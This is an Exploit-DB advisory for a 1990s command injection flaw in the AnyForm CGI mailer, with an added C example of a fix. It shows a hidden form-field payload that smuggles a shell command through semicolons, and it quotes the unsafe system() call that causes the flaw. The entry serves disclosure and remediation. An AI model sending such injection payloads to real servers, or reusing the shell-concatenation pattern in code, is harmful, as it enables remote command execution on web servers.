Exploit John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon

Exploiter

18 Dec 2022
EDB-ID: 19557
EDB verified: Passed
Author: PAUL PHILLIPS
Vulnerability type: REMOTE
Platform: LINUX
CVE: CVE-1999-0066
Publication date: 1995-07-31
Code:
source: https://www.securityfocus.com/bid/719/info

AnyForm is a popular form CGI designed to support simple forms that deliver responses via email. Certain versions of AnyForm did not sanity-check user-supplied data and could be exploited by remote intruders to execute arbitrary commands. These commands ran with the UID of the web server, typically 'nobody'.

Exploit as taken from the original post on this issue:

To exploit, create a form with a hidden field something like this:

<input type="hidden" name="AnyFormTo" value="[email protected];command-to-execute
with whatever arguments;/usr/lib/sendmail -t [email protected] ">

Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:

SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
system(SystemCommand);

Since system invokes a shell, the semicolons are treated as command
delimiters and anything can be inserted.
 
Source
www.exploit-db.com
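
The corrected form of the pattern quoted above, as an added example (not AnyForm's code and not part of the original post): the recipient is checked against an allow-list and the mailer is started with an argument vector, so no shell ever parses the form field. The function names `recipient_ok` and `send_form`, the permitted character set, and passing the recipient as a plain sendmail argument are assumptions made for this sketch.

```c
#include <ctype.h>
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list check: one local@domain address, no shell metacharacters,
 * no whitespace, no leading '-' (which the mailer would read as an option). */
int recipient_ok(const char *to)
{
    size_t n = strlen(to);
    const char *at = strchr(to, '@');

    if (n == 0 || n > 254 || to[0] == '-')
        return 0;
    if (!at || at == to || at[1] == '\0' || strchr(at + 1, '@'))
        return 0;
    for (const char *p = to; *p; p++)
        if (!isalnum((unsigned char)*p) && !strchr("@._+-", *p))
            return 0;
    return 1;
}

/* Replaces system("/usr/lib/sendmail -t " + AnyFormTo + " <" + file).
 * Returns the mailer's exit status, or -1 on rejected input or error. */
int send_form(const char *mailer, const char *to, const char *body_path)
{
    int status;
    pid_t pid;

    if (!recipient_ok(to))
        return -1;                      /* rejected before any process starts */
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open(body_path, O_RDONLY);   /* stands in for the shell's "< file" */
        if (fd < 0 || dup2(fd, STDIN_FILENO) < 0)
            _exit(127);
        char *const argv[] = { "sendmail", (char *)to, NULL };
        execv(mailer, argv);            /* argv is passed as-is; ';' has no meaning here */
        _exit(127);                     /* only reached if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Either measure alone closes the semicolon case; together they also cover option injection through a recipient that begins with `-`.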